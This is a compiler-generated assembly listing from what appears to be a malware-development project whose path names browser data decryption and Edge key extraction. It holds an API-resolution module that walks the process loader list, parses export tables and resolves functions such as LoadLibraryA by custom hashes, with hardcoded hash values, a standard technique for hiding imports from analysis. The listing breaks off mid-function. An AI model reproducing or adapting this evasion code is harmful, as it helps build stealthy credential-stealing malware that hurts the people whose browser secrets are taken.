; Listing generated by Microsoft (R) Optimizing Compiler Version 19.50.35728.0 

include listing.inc

INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES

PUBLIC	??0ApiResolve@@QEAA@XZ				; ApiResolve::ApiResolve
PUBLIC	??1ApiResolve@@QEAA@XZ				; ApiResolve::~ApiResolve
PUBLIC	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXQEA_W@Z ; ApiResolve::GetModuleBaseAddress
PUBLIC	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z	; ApiResolve::GetModuleBaseAddress
PUBLIC	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXPEBD@Z	; ApiResolve::GetApiAddress
PUBLIC	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z	; ApiResolve::GetApiAddress
PUBLIC	?Rotr@@YAIII@Z					; Rotr
PUBLIC	?ComplexHashForWChar@@YAIPEB_W@Z		; ComplexHashForWChar
PUBLIC	?ComplexHashForAnsi@@YAIPEBD@Z			; ComplexHashForAnsi
EXTRN	?LowerStringA@@YA_NPEAD@Z:PROC			; LowerStringA
EXTRN	?LowerStringW@@YA_NPEA_W@Z:PROC			; LowerStringW
EXTRN	?CompareStringA@@YA_NPEBD0@Z:PROC		; CompareStringA
EXTRN	?CompareStringW@@YA_NPEB_W0@Z:PROC		; CompareStringW
EXTRN	?FindPatternW@@YA_NPEB_W0_KPEAPEA_W@Z:PROC	; FindPatternW
EXTRN	?CopyStringA@@YA_NPEBDPEAD_K@Z:PROC		; CopyStringA
EXTRN	?CopyStringW@@YA_NPEB_WPEA_W_K@Z:PROC		; CopyStringW
EXTRN	?StringAToW@@YA_NPEADPEA_W@Z:PROC		; StringAToW
EXTRN	?StrLen@@YA_KPEAD@Z:PROC			; StrLen
;	COMDAT pdata
;	COMDAT pdata
;	COMDAT xdata
;	COMDAT xdata
; Function compile flags: /Odtp
;	COMDAT ?ComplexHashForAnsi@@YAIPEBD@Z
_TEXT	SEGMENT
i$1 = 32
hash$ = 36
temp$ = 40
str$ = 64
?ComplexHashForAnsi@@YAIPEBD@Z PROC			; ComplexHashForAnsi, COMDAT
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\HashString.h
; Line 23
$LN6:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 56					; 00000038H
; Line 24
	mov	DWORD PTR hash$[rsp], -1		; ffffffffH
; Line 28
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@ComplexHas
$LN2@ComplexHas:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@ComplexHas:
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR str$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	je	SHORT $LN3@ComplexHas
; Line 29
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR str$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	add	eax, DWORD PTR hash$[rsp]
	mov	DWORD PTR temp$[rsp], eax
; Line 30
	mov	edx, 3
	mov	ecx, DWORD PTR hash$[rsp]
	call	?Rotr@@YAIII@Z				; Rotr
	xor	eax, DWORD PTR temp$[rsp]
	mov	DWORD PTR hash$[rsp], eax
; Line 31
	jmp	SHORT $LN2@ComplexHas
$LN3@ComplexHas:
; Line 33
	mov	eax, DWORD PTR hash$[rsp]
; Line 34
	add	rsp, 56					; 00000038H
	ret	0
?ComplexHashForAnsi@@YAIPEBD@Z ENDP			; ComplexHashForAnsi
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?ComplexHashForWChar@@YAIPEB_W@Z
_TEXT	SEGMENT
i$1 = 32
hash$ = 36
temp$ = 40
str$ = 64
?ComplexHashForWChar@@YAIPEB_W@Z PROC			; ComplexHashForWChar, COMDAT
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\HashString.h
; Line 9
$LN6:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 56					; 00000038H
; Line 10
	mov	DWORD PTR hash$[rsp], -1		; ffffffffH
; Line 14
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@ComplexHas
$LN2@ComplexHas:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@ComplexHas:
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR str$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	je	SHORT $LN3@ComplexHas
; Line 15
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR str$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	add	eax, DWORD PTR hash$[rsp]
	mov	DWORD PTR temp$[rsp], eax
; Line 16
	mov	edx, 3
	mov	ecx, DWORD PTR hash$[rsp]
	call	?Rotr@@YAIII@Z				; Rotr
	xor	eax, DWORD PTR temp$[rsp]
	mov	DWORD PTR hash$[rsp], eax
; Line 17
	jmp	SHORT $LN2@ComplexHas
$LN3@ComplexHas:
; Line 19
	mov	eax, DWORD PTR hash$[rsp]
; Line 20
	add	rsp, 56					; 00000038H
	ret	0
?ComplexHashForWChar@@YAIPEB_W@Z ENDP			; ComplexHashForWChar
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?Rotr@@YAIII@Z
_TEXT	SEGMENT
x$ = 8
n$ = 16
?Rotr@@YAIII@Z PROC					; Rotr, COMDAT
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\HashString.h
; Line 4
	mov	DWORD PTR [rsp+16], edx
	mov	DWORD PTR [rsp+8], ecx
; Line 5
	mov	eax, DWORD PTR n$[rsp]
	movzx	ecx, al
	mov	eax, DWORD PTR x$[rsp]
	shr	eax, cl
	mov	ecx, 32					; 00000020H
	sub	ecx, DWORD PTR n$[rsp]
	mov	edx, DWORD PTR x$[rsp]
	shl	edx, cl
	mov	ecx, edx
	or	eax, ecx
; Line 6
	ret	0
?Rotr@@YAIII@Z ENDP					; Rotr
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 32
size$2 = 36
dll$3 = 40
ordinal$4 = 44
i$5 = 48
rvaFunction$6 = 52
pExportDirectory$ = 56
s$7 = 64
rvaName$8 = 72
sName$9 = 80
lpFunction$10 = 88
lpNewDll$11 = 96
lpKernel32$12 = 104
pLoadLibraryA$13 = 112
hModule$14 = 120
index$ = 128
hashKernel32$15 = 132
hashLoadLibraryA$16 = 136
pDosHeader$ = 144
pNtHeaders$ = 152
pOptionalHeader$ = 160
pExportDataDirectory$ = 168
pAddressOfName$ = 176
pAddressOfOrdinal$ = 184
pAddressOfFunction$ = 192
tv191 = 200
sDllName$17 = 208
sNewApiName$18 = 480
wsDllName$19 = 752
this$ = 1296
lpBaseAddress$ = 1304
hash$ = 1312
?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z PROC		; ApiResolve::GetApiAddress
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\ApiResolve.cpp
; Line 114
$LN16:
	mov	DWORD PTR [rsp+24], r8d
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	push	rdi
	sub	rsp, 1280				; 00000500H
; Line 115
	mov	rax, QWORD PTR lpBaseAddress$[rsp]
	mov	QWORD PTR pDosHeader$[rsp], rax
; Line 116
	mov	rax, QWORD PTR pDosHeader$[rsp]
	movsxd	rax, DWORD PTR [rax+60]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pNtHeaders$[rsp], rax
; Line 117
	mov	rax, QWORD PTR pNtHeaders$[rsp]
	add	rax, 24
	mov	QWORD PTR pOptionalHeader$[rsp], rax
; Line 118
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR pOptionalHeader$[rsp]
	lea	rax, QWORD PTR [rcx+rax+112]
	mov	QWORD PTR pExportDataDirectory$[rsp], rax
; Line 120
	mov	rax, QWORD PTR pExportDataDirectory$[rsp]
	mov	eax, DWORD PTR [rax]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pExportDirectory$[rsp], rax
; Line 122
	mov	DWORD PTR index$[rsp], 0
; Line 123
	mov	rax, QWORD PTR pExportDirectory$[rsp]
	mov	eax, DWORD PTR [rax+32]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressOfName$[rsp], rax
; Line 124
	mov	rax, QWORD PTR pExportDirectory$[rsp]
	mov	eax, DWORD PTR [rax+36]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressOfOrdinal$[rsp], rax
; Line 125
	mov	rax, QWORD PTR pExportDirectory$[rsp]
	mov	eax, DWORD PTR [rax+28]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressOfFunction$[rsp], rax
; Line 127
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@GetApiAddr
$LN2@GetApiAddr:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@GetApiAddr:
	mov	rax, QWORD PTR pExportDirectory$[rsp]
	mov	eax, DWORD PTR [rax+24]
	cmp	DWORD PTR i$1[rsp], eax
	jae	$LN3@GetApiAddr
; Line 128
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR pAddressOfName$[rsp]
	mov	eax, DWORD PTR [rcx+rax*4]
	mov	DWORD PTR rvaName$8[rsp], eax
; Line 129
	mov	eax, DWORD PTR rvaName$8[rsp]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR sName$9[rsp], rax
; Line 130
	mov	rcx, QWORD PTR sName$9[rsp]
	call	?ComplexHashForAnsi@@YAIPEBD@Z		; ComplexHashForAnsi
	cmp	eax, DWORD PTR hash$[rsp]
	je	SHORT $LN8@GetApiAddr
; Line 131
	jmp	SHORT $LN2@GetApiAddr
$LN8@GetApiAddr:
; Line 134
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR pAddressOfOrdinal$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	mov	WORD PTR ordinal$4[rsp], ax
; Line 135
	movzx	eax, WORD PTR ordinal$4[rsp]
	mov	rcx, QWORD PTR pAddressOfFunction$[rsp]
	mov	eax, DWORD PTR [rcx+rax*4]
	mov	DWORD PTR rvaFunction$6[rsp], eax
; Line 136
	mov	eax, DWORD PTR rvaFunction$6[rsp]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR lpFunction$10[rsp], rax
; Line 137
	mov	rcx, QWORD PTR sName$9[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	rcx, QWORD PTR sName$9[rsp]
	lea	rax, QWORD PTR [rcx+rax+1]
	cmp	rax, QWORD PTR lpFunction$10[rsp]
	jne	$LN9@GetApiAddr
; Line 138
	mov	rax, QWORD PTR lpFunction$10[rsp]
	mov	QWORD PTR s$7[rsp], rax
; Line 139
	mov	DWORD PTR size$2[rsp], 0
; Line 140
	mov	DWORD PTR i$5[rsp], 0
	jmp	SHORT $LN7@GetApiAddr
$LN5@GetApiAddr:
	mov	eax, DWORD PTR i$5[rsp]
	inc	eax
	mov	DWORD PTR i$5[rsp], eax
$LN7@GetApiAddr:
; Line 141
	mov	rax, QWORD PTR s$7[rsp]
	movsx	eax, BYTE PTR [rax]
	cmp	eax, 46					; 0000002eH
	jne	SHORT $LN10@GetApiAddr
; Line 142
	jmp	SHORT $LN6@GetApiAddr
$LN10@GetApiAddr:
; Line 145
	mov	rax, QWORD PTR s$7[rsp]
	inc	rax
	mov	QWORD PTR s$7[rsp], rax
; Line 146
	mov	eax, DWORD PTR size$2[rsp]
	inc	eax
	mov	DWORD PTR size$2[rsp], eax
; Line 147
	jmp	SHORT $LN5@GetApiAddr
$LN6@GetApiAddr:
; Line 149
	lea	rax, QWORD PTR sDllName$17[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 150
	mov	eax, DWORD PTR size$2[rsp]
	add	eax, 4
	cdqe
	mov	r8, rax
	lea	rdx, QWORD PTR sDllName$17[rsp]
	mov	rcx, QWORD PTR lpFunction$10[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 151
	mov	BYTE PTR dll$3[rsp], 46			; 0000002eH
	mov	BYTE PTR dll$3[rsp+1], 100		; 00000064H
	mov	BYTE PTR dll$3[rsp+2], 108		; 0000006cH
	mov	BYTE PTR dll$3[rsp+3], 108		; 0000006cH
; Line 152
	movsxd	rax, DWORD PTR size$2[rsp]
	lea	rax, QWORD PTR sDllName$17[rsp+rax]
	mov	r8d, 4
	mov	rdx, rax
	lea	rcx, QWORD PTR dll$3[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 153
	lea	rcx, QWORD PTR sDllName$17[rsp]
	call	?LowerStringA@@YA_NPEAD@Z		; LowerStringA
; Line 154
	lea	rax, QWORD PTR wsDllName$19[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 520				; 00000208H
	rep stosb
; Line 155
	lea	rdx, QWORD PTR wsDllName$19[rsp]
	lea	rcx, QWORD PTR sDllName$17[rsp]
	call	?StringAToW@@YA_NPEADPEA_W@Z		; StringAToW
; Line 157
	lea	rax, QWORD PTR sNewApiName$18[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 158
	mov	rax, QWORD PTR s$7[rsp]
	inc	rax
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR sNewApiName$18[rsp]
	mov	rcx, rax
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 159
	lea	rcx, QWORD PTR wsDllName$19[rsp]
	call	?ComplexHashForWChar@@YAIPEB_W@Z	; ComplexHashForWChar
	mov	edx, eax
	mov	rcx, QWORD PTR this$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpNewDll$11[rsp], rax
; Line 160
	cmp	QWORD PTR lpNewDll$11[rsp], 0
	jne	$LN11@GetApiAddr
; Line 161
	mov	DWORD PTR hashKernel32$15[rsp], 764661557 ; 2d93cf35H
; Line 162
	mov	edx, 764661557				; 2d93cf35H
	mov	rcx, QWORD PTR this$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$12[rsp], rax
; Line 163
	cmp	QWORD PTR lpKernel32$12[rsp], 0
	jne	SHORT $LN12@GetApiAddr
	xor	eax, eax
	jmp	$LN1@GetApiAddr
$LN12@GetApiAddr:
; Line 164
	mov	DWORD PTR hashLoadLibraryA$16[rsp], -462133483 ; e4746715H
; Line 166
	mov	r8d, -462133483				; e4746715H
	mov	rdx, QWORD PTR lpKernel32$12[rsp]
	mov	rcx, QWORD PTR this$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pLoadLibraryA$13[rsp], rax
; Line 167
	cmp	QWORD PTR pLoadLibraryA$13[rsp], 0
	jne	SHORT $LN13@GetApiAddr
	xor	eax, eax
	jmp	SHORT $LN1@GetApiAddr
$LN13@GetApiAddr:
; Line 168
	mov	rax, QWORD PTR pLoadLibraryA$13[rsp]
	mov	QWORD PTR tv191[rsp], rax
	lea	rcx, QWORD PTR sDllName$17[rsp]
	call	QWORD PTR tv191[rsp]
	mov	QWORD PTR hModule$14[rsp], rax
; Line 169
	cmp	QWORD PTR hModule$14[rsp], 0
	jne	SHORT $LN14@GetApiAddr
	xor	eax, eax
	jmp	SHORT $LN1@GetApiAddr
$LN14@GetApiAddr:
; Line 170
	mov	rax, QWORD PTR hModule$14[rsp]
	mov	QWORD PTR lpNewDll$11[rsp], rax
$LN11@GetApiAddr:
; Line 173
	lea	rcx, QWORD PTR sNewApiName$18[rsp]
	call	?ComplexHashForAnsi@@YAIPEBD@Z		; ComplexHashForAnsi
	mov	r8d, eax
	mov	rdx, QWORD PTR lpNewDll$11[rsp]
	mov	rcx, QWORD PTR this$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	jmp	SHORT $LN1@GetApiAddr
$LN9@GetApiAddr:
; Line 176
	mov	eax, DWORD PTR rvaFunction$6[rsp]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	jmp	SHORT $LN1@GetApiAddr
; Line 177
	jmp	$LN2@GetApiAddr
$LN3@GetApiAddr:
; Line 179
	xor	eax, eax
$LN1@GetApiAddr:
; Line 180
	add	rsp, 1280				; 00000500H
	pop	rdi
	ret	0
?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ENDP		; ApiResolve::GetApiAddress
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 32
ordinal$2 = 36
pExportDirectory$ = 40
rvaName$3 = 48
rvaFunction$4 = 52
index$ = 56
pDosHeader$ = 64
pNtHeaders$ = 72
pOptionalHeader$ = 80
pExportDataDirectory$ = 88
pAddressOfName$ = 96
sName$5 = 104
pAddressOfOrdinal$ = 112
pAddressOfFunction$ = 120
this$ = 144
lpBaseAddress$ = 152
sApiName$ = 160
?GetApiAddress@ApiResolve@@QEAAPEAXPEAXPEBD@Z PROC	; ApiResolve::GetApiAddress
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\ApiResolve.cpp
; Line 86
$LN7:
	mov	QWORD PTR [rsp+24], r8
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 136				; 00000088H
; Line 87
	mov	rax, QWORD PTR lpBaseAddress$[rsp]
	mov	QWORD PTR pDosHeader$[rsp], rax
; Line 88
	mov	rax, QWORD PTR pDosHeader$[rsp]
	movsxd	rax, DWORD PTR [rax+60]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pNtHeaders$[rsp], rax
; Line 89
	mov	rax, QWORD PTR pNtHeaders$[rsp]
	add	rax, 24
	mov	QWORD PTR pOptionalHeader$[rsp], rax
; Line 90
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR pOptionalHeader$[rsp]
	lea	rax, QWORD PTR [rcx+rax+112]
	mov	QWORD PTR pExportDataDirectory$[rsp], rax
; Line 92
	mov	rax, QWORD PTR pExportDataDirectory$[rsp]
	mov	eax, DWORD PTR [rax]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pExportDirectory$[rsp], rax
; Line 94
	mov	DWORD PTR index$[rsp], 0
; Line 95
	mov	rax, QWORD PTR pExportDirectory$[rsp]
	mov	eax, DWORD PTR [rax+32]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressOfName$[rsp], rax
; Line 96
	mov	rax, QWORD PTR pExportDirectory$[rsp]
	mov	eax, DWORD PTR [rax+36]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressOfOrdinal$[rsp], rax
; Line 97
	mov	rax, QWORD PTR pExportDirectory$[rsp]
	mov	eax, DWORD PTR [rax+28]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressOfFunction$[rsp], rax
; Line 99
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@GetApiAddr
$LN2@GetApiAddr:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@GetApiAddr:
	mov	rax, QWORD PTR pExportDirectory$[rsp]
	mov	eax, DWORD PTR [rax+24]
	cmp	DWORD PTR i$1[rsp], eax
	jae	$LN3@GetApiAddr
; Line 100
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR pAddressOfName$[rsp]
	mov	eax, DWORD PTR [rcx+rax*4]
	mov	DWORD PTR rvaName$3[rsp], eax
; Line 101
	mov	eax, DWORD PTR rvaName$3[rsp]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR sName$5[rsp], rax
; Line 102
	mov	rdx, QWORD PTR sApiName$[rsp]
	mov	rcx, QWORD PTR sName$5[rsp]
	call	?CompareStringA@@YA_NPEBD0@Z		; CompareStringA
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN5@GetApiAddr
; Line 103
	jmp	SHORT $LN2@GetApiAddr
$LN5@GetApiAddr:
; Line 106
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR pAddressOfOrdinal$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	mov	WORD PTR ordinal$2[rsp], ax
; Line 107
	movzx	eax, WORD PTR ordinal$2[rsp]
	mov	rcx, QWORD PTR pAddressOfFunction$[rsp]
	mov	eax, DWORD PTR [rcx+rax*4]
	mov	DWORD PTR rvaFunction$4[rsp], eax
; Line 108
	mov	eax, DWORD PTR rvaFunction$4[rsp]
	mov	rcx, QWORD PTR lpBaseAddress$[rsp]
	add	rcx, rax
	mov	rax, rcx
	jmp	SHORT $LN1@GetApiAddr
; Line 109
	jmp	$LN2@GetApiAddr
$LN3@GetApiAddr:
; Line 111
	xor	eax, eax
$LN1@GetApiAddr:
; Line 112
	add	rsp, 136				; 00000088H
	ret	0
?GetApiAddress@ApiResolve@@QEAAPEAXPEAXPEBD@Z ENDP	; ApiResolve::GetApiAddress
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
wsPattern$1 = 32
pDllName$2 = 40
fl$ = 48
pLdrData$ = 56
pDllPath$3 = 64
pEntry$4 = 72
wsModuleName$5 = 80
this$ = 624
hash$ = 632
?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z PROC	; ApiResolve::GetModuleBaseAddress
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\ApiResolve.cpp
; Line 52
$LN11:
	mov	DWORD PTR [rsp+16], edx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 616				; 00000268H
; Line 53
	mov	rax, QWORD PTR this$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	rax, QWORD PTR [rax+24]
	mov	QWORD PTR pLdrData$[rsp], rax
; Line 54
	mov	rax, QWORD PTR pLdrData$[rsp]
	mov	rax, QWORD PTR [rax+32]
	mov	QWORD PTR fl$[rsp], rax
$LN10@GetModuleB:
$LN2@GetModuleB:
; Line 55
	mov	rax, QWORD PTR pLdrData$[rsp]
	add	rax, 32					; 00000020H
	cmp	QWORD PTR fl$[rsp], rax
	je	$LN3@GetModuleB
; Line 56
	mov	rax, QWORD PTR fl$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	QWORD PTR fl$[rsp], rax
; Line 57
	mov	rax, QWORD PTR fl$[rsp]
	sub	rax, 16
	mov	QWORD PTR pEntry$4[rsp], rax
; Line 58
	mov	rax, QWORD PTR pEntry$4[rsp]
	mov	rax, QWORD PTR [rax+80]
	mov	QWORD PTR pDllPath$3[rsp], rax
; Line 59
	cmp	QWORD PTR pDllPath$3[rsp], 0
	jne	SHORT $LN6@GetModuleB
; Line 60
	jmp	$LN3@GetModuleB
$LN6@GetModuleB:
; Line 63
	mov	QWORD PTR pDllName$2[rsp], 0
; Line 64
	mov	eax, 92					; 0000005cH
	mov	WORD PTR wsPattern$1[rsp], ax
; Line 65
	lea	r9, QWORD PTR pDllName$2[rsp]
	mov	r8d, 1
	lea	rdx, QWORD PTR wsPattern$1[rsp]
	mov	rcx, QWORD PTR pDllPath$3[rsp]
	call	?FindPatternW@@YA_NPEB_W0_KPEAPEA_W@Z	; FindPatternW
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN7@GetModuleB
; Line 66
	jmp	SHORT $LN2@GetModuleB
$LN7@GetModuleB:
$LN4@GetModuleB:
; Line 69
	lea	r9, QWORD PTR pDllName$2[rsp]
	mov	r8d, 1
	lea	rdx, QWORD PTR wsPattern$1[rsp]
	mov	rcx, QWORD PTR pDllName$2[rsp]
	call	?FindPatternW@@YA_NPEB_W0_KPEAPEA_W@Z	; FindPatternW
	movzx	eax, al
	test	eax, eax
	je	SHORT $LN5@GetModuleB
; Line 70
	mov	rax, QWORD PTR pDllName$2[rsp]
	add	rax, 2
	mov	QWORD PTR pDllName$2[rsp], rax
; Line 71
	jmp	SHORT $LN4@GetModuleB
$LN5@GetModuleB:
; Line 74
	mov	r8d, 520				; 00000208H
	lea	rdx, QWORD PTR wsModuleName$5[rsp]
	mov	rcx, QWORD PTR pDllName$2[rsp]
	call	?CopyStringW@@YA_NPEB_WPEA_W_K@Z	; CopyStringW
; Line 75
	mov	rcx, QWORD PTR pDllName$2[rsp]
	call	?LowerStringW@@YA_NPEA_W@Z		; LowerStringW
	npad	1
; Line 76
	mov	rcx, QWORD PTR pDllName$2[rsp]
	call	?ComplexHashForWChar@@YAIPEB_W@Z	; ComplexHashForWChar
	cmp	eax, DWORD PTR hash$[rsp]
	je	SHORT $LN8@GetModuleB
; Line 77
	jmp	$LN10@GetModuleB
$LN8@GetModuleB:
; Line 80
	mov	rax, QWORD PTR pEntry$4[rsp]
	mov	rax, QWORD PTR [rax+48]
	jmp	SHORT $LN1@GetModuleB
; Line 81
	jmp	$LN2@GetModuleB
$LN3@GetModuleB:
; Line 83
	xor	eax, eax
$LN1@GetModuleB:
; Line 84
	add	rsp, 616				; 00000268H
	ret	0
?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ENDP	; ApiResolve::GetModuleBaseAddress
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
wsPattern$1 = 32
pDllName$2 = 40
fl$ = 48
pLdrData$ = 56
pDllPath$3 = 64
pEntry$4 = 72
wsModuleName$5 = 80
this$ = 624
lpwsModuleName$ = 632
?GetModuleBaseAddress@ApiResolve@@QEAAPEAXQEA_W@Z PROC	; ApiResolve::GetModuleBaseAddress
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\ApiResolve.cpp
; Line 15
$LN11:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 616				; 00000268H
; Line 16
	mov	rax, QWORD PTR this$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	rax, QWORD PTR [rax+24]
	mov	QWORD PTR pLdrData$[rsp], rax
; Line 17
	mov	rax, QWORD PTR pLdrData$[rsp]
	mov	rax, QWORD PTR [rax+32]
	mov	QWORD PTR fl$[rsp], rax
$LN10@GetModuleB:
$LN2@GetModuleB:
; Line 18
	mov	rax, QWORD PTR pLdrData$[rsp]
	add	rax, 32					; 00000020H
	cmp	QWORD PTR fl$[rsp], rax
	je	$LN3@GetModuleB
; Line 19
	mov	rax, QWORD PTR fl$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	QWORD PTR fl$[rsp], rax
; Line 20
	mov	rax, QWORD PTR fl$[rsp]
	sub	rax, 16
	mov	QWORD PTR pEntry$4[rsp], rax
; Line 21
	mov	rax, QWORD PTR pEntry$4[rsp]
	mov	rax, QWORD PTR [rax+80]
	mov	QWORD PTR pDllPath$3[rsp], rax
; Line 22
	cmp	QWORD PTR pDllPath$3[rsp], 0
	jne	SHORT $LN6@GetModuleB
; Line 23
	jmp	$LN3@GetModuleB
$LN6@GetModuleB:
; Line 26
	mov	QWORD PTR pDllName$2[rsp], 0
; Line 27
	mov	eax, 92					; 0000005cH
	mov	WORD PTR wsPattern$1[rsp], ax
; Line 28
	lea	r9, QWORD PTR pDllName$2[rsp]
	mov	r8d, 1
	lea	rdx, QWORD PTR wsPattern$1[rsp]
	mov	rcx, QWORD PTR pDllPath$3[rsp]
	call	?FindPatternW@@YA_NPEB_W0_KPEAPEA_W@Z	; FindPatternW
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN7@GetModuleB
; Line 29
	jmp	SHORT $LN2@GetModuleB
$LN7@GetModuleB:
$LN4@GetModuleB:
; Line 32
	lea	r9, QWORD PTR pDllName$2[rsp]
	mov	r8d, 1
	lea	rdx, QWORD PTR wsPattern$1[rsp]
	mov	rcx, QWORD PTR pDllName$2[rsp]
	call	?FindPatternW@@YA_NPEB_W0_KPEAPEA_W@Z	; FindPatternW
	movzx	eax, al
	test	eax, eax
	je	SHORT $LN5@GetModuleB
; Line 33
	mov	rax, QWORD PTR pDllName$2[rsp]
	add	rax, 2
	mov	QWORD PTR pDllName$2[rsp], rax
; Line 34
	jmp	SHORT $LN4@GetModuleB
$LN5@GetModuleB:
; Line 37
	mov	r8d, 520				; 00000208H
	lea	rdx, QWORD PTR wsModuleName$5[rsp]
